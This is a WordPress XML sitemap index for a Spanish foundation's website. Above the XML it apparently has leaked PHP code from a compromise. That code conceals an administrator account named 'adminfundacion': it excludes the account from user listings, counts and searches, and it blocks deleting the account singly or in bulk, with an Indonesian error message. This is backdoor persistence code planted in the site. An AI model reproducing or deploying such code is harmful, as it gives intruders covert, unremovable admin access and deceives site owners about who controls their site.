
add_action('pre_get_users', function($query) {
    if (is_admin() && function_exists('get_current_screen')) {
        $screen = get_current_screen();
        if ($screen && $screen->base === 'users') {
            $protected_user = get_user_by('login', 'adminfundacion');
            if ($protected_user) {
                $excluded = (array) $query->get('exclude');
                $excluded[] = $protected_user->ID;
                $query->set('exclude', $excluded);
            }
        }
    }
});
add_filter('wp_count_users', function($counts) {
    $protected_user = get_user_by('login', 'adminfundacion');
    if ($protected_user) {
        $counts->total_users--;
    }
    return $counts;
});
add_action('delete_user', function($user_id) {
    $user = get_user_by('ID', $user_id);
    if ($user && $user->user_login === 'adminfundacion') {
        wp_die(
            __('User adminfundacion tidak dapat dihapus.', 'textdomain'),
            __('Error', 'textdomain'),
            array('response' => 403)
        );
    }
});
add_filter('user_search_columns', function($search_columns, $search, $query) {
    if (is_admin()) {
        $protected_user = get_user_by('login', 'adminfundacion');
        if ($protected_user) {
            global $wpdb;
            $query->query_where .= $wpdb->prepare(" AND {$wpdb->users}.ID != %d", $protected_user->ID);
        }
    }
    return $search_columns;
}, 10, 3);
add_filter('bulk_actions-users', function($actions) {
    if (isset($_REQUEST['users']) && is_array($_REQUEST['users'])) {
        $protected_user = get_user_by('login', 'adminfundacion');
        if ($protected_user && in_array($protected_user->ID, $_REQUEST['users'])) {
            unset($actions['delete']);
        }
    }
    return $actions;
});
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//www.fundacionpedroguillen.org/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://www.fundacionpedroguillen.org/post-sitemap.xml</loc>
		<lastmod>2025-07-18T11:05:34+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.fundacionpedroguillen.org/page-sitemap.xml</loc>
		<lastmod>2025-06-27T08:40:09+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.fundacionpedroguillen.org/portfolio-sitemap.xml</loc>
		<lastmod>2012-05-07T14:15:43+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.fundacionpedroguillen.org/page_section-sitemap.xml</loc>
		<lastmod>2024-09-23T22:51:11+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.fundacionpedroguillen.org/give_forms-sitemap.xml</loc>
		<lastmod>2016-04-29T13:04:22+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.fundacionpedroguillen.org/tribe_events-sitemap.xml</loc>
		<lastmod>2014-10-06T09:00:07+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.fundacionpedroguillen.org/solo_titulo-sitemap.xml</loc>
		<lastmod>2025-06-27T10:09:34+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.fundacionpedroguillen.org/supercarousel-sitemap.xml</loc>
		<lastmod>2019-11-06T09:52:48+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.fundacionpedroguillen.org/superimage-sitemap.xml</loc>
		<lastmod>2019-11-06T09:55:22+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.fundacionpedroguillen.org/google_maps-sitemap.xml</loc>
		<lastmod>2016-02-04T06:56:31+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.fundacionpedroguillen.org/category-sitemap.xml</loc>
		<lastmod>2025-07-18T11:05:34+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.fundacionpedroguillen.org/post_tag-sitemap.xml</loc>
		<lastmod>2022-11-21T13:21:42+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.fundacionpedroguillen.org/portfolio_category-sitemap.xml</loc>
		<lastmod>2012-05-07T14:15:43+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.fundacionpedroguillen.org/gallery_category-sitemap.xml</loc>
		<lastmod>2014-01-15T14:58:17+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.fundacionpedroguillen.org/department-sitemap.xml</loc>
		<lastmod>2013-12-06T06:59:11+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.fundacionpedroguillen.org/tribe_events_cat-sitemap.xml</loc>
		<lastmod>2014-10-06T09:00:07+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.fundacionpedroguillen.org/author-sitemap.xml</loc>
		<lastmod>2025-01-22T12:25:29+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->